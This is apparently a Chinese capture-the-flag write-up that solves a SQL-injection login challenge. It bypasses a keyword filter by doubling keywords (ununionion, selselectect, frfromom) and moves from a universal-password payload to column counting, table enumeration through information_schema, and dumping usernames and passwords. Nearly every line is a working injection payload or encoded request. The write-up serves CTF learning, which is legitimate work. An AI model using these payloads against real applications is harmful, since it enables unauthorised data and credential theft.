看到题目,应该是sql注入类型先试试万能密码
万能密码,闭合双引号?username=admin&password=admin' or '1'='1
构造payload
这里的提示是 => 做了严格的过滤 => 关键在绕过
/check.php?username=root%27+oorr+1%3D1%3B%23&password=root
查找column的数量
/check.php?username=admin' order by 3%23&password=1
反馈有error
推测by也是有过滤的用`bbyy代替
root = admin' oorrder bbyy 3#
=> Login Success
root = admin' oorrder bbyy 4#
=> Error
说明这个table里面有三列数据
下一步就是找到回显点
root = admin' union select 1,2,3
得到error
root => 9' ununionion selselectect 1,2,3#
得到说明column2 + column3 可以作为回显点
root => 9' ununionion selselectect 1,database(),version()#
下一步:利用information_schema.tables
爆破有哪些table
root => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek#
=> Error
root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()
猜测flag用到base64
再根据这个三个字段爆破数据
root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
得到flag
/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1